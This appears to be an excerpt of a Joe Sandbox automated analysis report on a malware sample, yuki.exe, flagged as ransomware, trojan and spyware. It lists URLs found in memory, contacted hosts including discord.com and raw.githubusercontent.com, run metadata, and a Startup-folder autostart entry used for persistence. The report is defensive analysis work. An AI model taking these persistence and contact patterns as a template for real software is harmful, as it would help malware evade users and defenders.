        https://hosted.weblate.org/projects/iso-codes/iso-639-3/ru/ ? .scr, 00000011.00000003.2125010242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-639-5/tr/yuki.exe, 00000000.00000003.1733324392.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.microsoft.copowershell.exe, 00000015.00000002.2421506568.000001B66F974000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://github.com/python/importlib_metadata ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://github.com/python/importlib_metadata/issues ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://hosted.weblate.org/projects/iso-codes/iso-639-3/kmr/iso639-3.mo45.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://hosted.weblate.org/projects/iso-codes/iso-639-5/id/ ? .scr, 00000011.00000003.2105868793.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://hosted.weblate.org/projects/iso-codes/iso-3166-2/kab/yuki.exe, 00000000.00000003.1714726870.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1714726870.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://hosted.weblate.org/projects/iso-codes/iso-639-3/kab/ ? .scr, 00000011.00000003.2108870058.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://hosted.weblate.org/projects/iso-codes/iso-639-3/zu/ ? .scr, 00000011.00000003.2140615605.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/pyca/cryptography/actions?query=workflow%3ACIyuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://importlib-metadata.readthedocs.io/ ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.apache.org/licenses/LICENSE-2.0yuki.exe, 00000000.00000003.1673233448.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1673205597.0000021E0C70D000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 ? .scr, 00000012.00000003.2162631055.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161702323.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160473168.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163513573.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2159887065.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160997219.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158766660.000001BE93237000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://hosted.weblate.org/projects/iso-codes/iso-15924/ia/yuki.exe, 00000000.00000003.1708452299.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ug/iso3166-1.mo14.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-2/hr/yuki.exe, 00000000.00000003.1707654129.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-1/yo/yuki.exe, 00000000.00000003.1736567539.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2138909975.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zh_Hant_HK/yuki.exe, 00000000.00000003.1737268242.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sk/yuki.exe, 00000000.00000003.1727675922.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-3166-2/tr/yuki.exe, 00000000.00000003.1732810189.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://hosted.weblate.org/projects/iso-codes/iso-639-5/ru/yuki.exe, 00000000.00000003.1726652753.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://refspecs.linuxfoundation.org/elf/gabi4 ? .scr, 00000012.00000003.2165826210.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162631055.000001BE931FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://hosted.weblate.org/projects/iso-codes/iso-4217/kab/iso4217.mo31.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hosted.weblate.org/projects/iso-codes/iso-3166-1/br/iso3166-1.mo139.17.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1964129202.0000023910070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://hosted.weblate.org/projects/iso-codes/iso-3166-1/te/ ? .scr, 00000011.00000003.2132532985.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://hosted.weblate.org/projects/iso-codes/iso-3166-3/zh_Hant_HK/ ? .scr, 00000011.00000003.2139731319.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://hosted.weblate.org/projects/iso-codes/iso-639-5/uk/ ? .scr, 00000011.00000003.2136635297.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1948692309.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657531000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754617761.00000253A6CC7000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93249000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157800742.000001BE93262000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kl/ ? .scr, 00000011.00000003.2109167350.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2109167350.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://hosted.weblate.org/projects/iso-codes/iso-15924/zh_Hant_HK/yuki.exe, 00000000.00000003.1737174800.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://hosted.weblate.org/projects/iso-codes/iso-639-5/lt/ ? .scr, 00000011.00000003.2111127311.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessyuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1755074427.00000253A6C3A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93208000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161342809.000001BE930C7000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158897676.000001BE930C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1948692309.0000023900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ar/iso3166-3.mo78.17.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://hosted.weblate.org/projects/iso-codes/iso-639-3/ps/ ? .scr, 00000011.00000003.2118299278.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://foo/bar.tgzyuki.exe, 00000001.00000003.1759115375.00000253A6D3B000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/python/cpython/issues/86361.yuki.exe, 00000001.00000003.1754446620.00000253A6C89000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754120068.00000253A6C89000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157252787.000001BE92D2A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157380248.000001BE93227000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161206638.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157471664.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160722727.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2165826210.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158897676.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160028830.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161884696.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162631055.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157188229.000001BE93227000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157855506.000001BE931C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.micpowershell.exe, 00000015.00000002.2423974013.000001B66FBC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.apache.org/licenses/yuki.exe, 00000000.00000003.1673233448.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainyuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://hosted.weblate.org/projects/iso-codes/iso-639-5/pl/yuki.exe, 00000000.00000003.1724843721.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gzyuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A7184000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1759287643.00000253A7091000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1759088370.00000253A71E1000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE935F4000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166420024.000001BE9368E000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163284427.000001BE93691000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2164935398.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2164935398.000001BE9368E000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163284427.000001BE9365C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pt_BR/yuki.exe, 00000000.00000003.1725526710.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://docs.python.org/3/reference/import.html#finders-and-loaders ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mi/yuki.exe, 00000000.00000003.1720602116.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ky/yuki.exe, 00000000.00000003.1719653463.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1719653463.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cryptography.io/en/latest/installation/yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://hosted.weblate.org/projects/iso-codes/iso-4217/sr/yuki.exe, 00000000.00000003.1730281705.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2129777959.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kab/ ? .scr, 00000011.00000003.2108870058.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://hosted.weblate.org/projects/iso-codes/iso-639-3/sr/yuki.exe, 00000000.00000003.1729908012.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cryptography.io/en/latest/security/yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1948692309.0000023900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://hosted.weblate.org/projects/iso-codes/iso-3166-1/son/yuki.exe, 00000000.00000003.1728605265.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hosted.weblate.org/projects/iso-codes/iso-3166-2/sr/ ? .scr, 00000011.00000003.2128937104.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sv/ ? .scr, 00000011.00000003.2130094242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://setuptools.pypa.io/en/latest/pkg_resources.htmlyuki.exe, 00000001.00000003.1754645986.00000253A6CAE000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93249000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157831335.000001BE9325B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://hosted.weblate.org/projects/iso-codes/iso-639-5/nb_NO/yuki.exe, 00000000.00000003.1722055616.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722055616.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mhr/ ? .scr, 00000011.00000003.2111723284.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pa_PK/yuki.exe, 00000000.00000003.1724233451.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1724233451.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/pyca/cryptography/issuesyuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://hosted.weblate.org/projects/iso-codes/iso-15924/ta/yuki.exe, 00000000.00000003.1731128332.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://readthedocs.org/projects/cryptography/badge/?version=latestyuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://hosted.weblate.org/projects/iso-codes/iso-639-5/fr/iso639-5.mo14.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hans/ ? .scr, 00000011.00000003.2139470248.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://mahler:8092/site-updates.pyyuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166874266.000001BE93582000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://hosted.weblate.org/projects/iso-codes/iso-3166-1/th/yuki.exe, 00000000.00000003.1731909290.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2132839671.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/pyca/cryptographyyuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cryptography.io/yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ta/yuki.exe, 00000000.00000003.1731353019.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, iso3166-3.mo96.17.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://contoso.com/Licensepowershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/pyca/cryptography/yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://salsa.debian.org/iso-codes-team/iso-codes/issuesyuki.exe, 00000000.00000003.1726477105.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1727539431.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725526710.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1730281705.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1720735281.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725356033.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1731128332.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1726862514.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1732300729.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725142698.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1733547239.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1714726870.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722884588.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1733763570.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1736567539.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1721854004.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1728459172.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722884588.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722187201.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1724401707.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1726771310.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://tidelift.com/badges/package/pypi/importlib-metadata ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sw/ ? .scr, 00000011.00000003.2131131213.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-3/hr/yuki.exe, 00000000.00000003.1707654129.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zu/yuki.exe, 00000000.00000003.1737899588.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso3166-1.mo53.0.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblat ? .scr, 00000011.00000003.2130094242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-15924/ka/yuki.exe, 00000000.00000003.1712115450.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-15924/si/ ? .scr, 00000011.00000003.2126318795.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2126318795.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ti/yuki.exe, 00000000.00000003.1732300729.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2133229880.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmp, iso3166-1.mo149.17.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-3166-1/uk/ ? .scr, 00000011.00000003.2135952422.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hant/yuki.exe, 00000000.00000003.1737899588.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso639-3.mo18.17.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cryptography.io/en/latest/changelog/yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ve/ ? .scr, 00000011.00000003.2136916095.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                162.159.138.232
                                                                                discord.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                185.199.109.133
                                                                                raw.githubusercontent.comNetherlands
                                                                                54113FASTLYUSfalse
                                                                                185.199.110.133
                                                                                unknownNetherlands
                                                                                54113FASTLYUSfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1550819
                                                                                Start date and time:2024-11-07 08:35:11 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 9m 49s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:34
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:yuki.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.rans.troj.adwa.spyw.evad.winEXE@42/1555@4/3
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 86
                                                                                • Number of non-executed functions: 116
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                • Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.67
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target powershell.exe, PID 3868 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                • VT rate limit hit for: yuki.exe
                                                                                TimeTypeDescription
                                                                                02:36:27API Interceptor98x Sleep call for process: powershell.exe modified
                                                                                07:36:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.scr
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
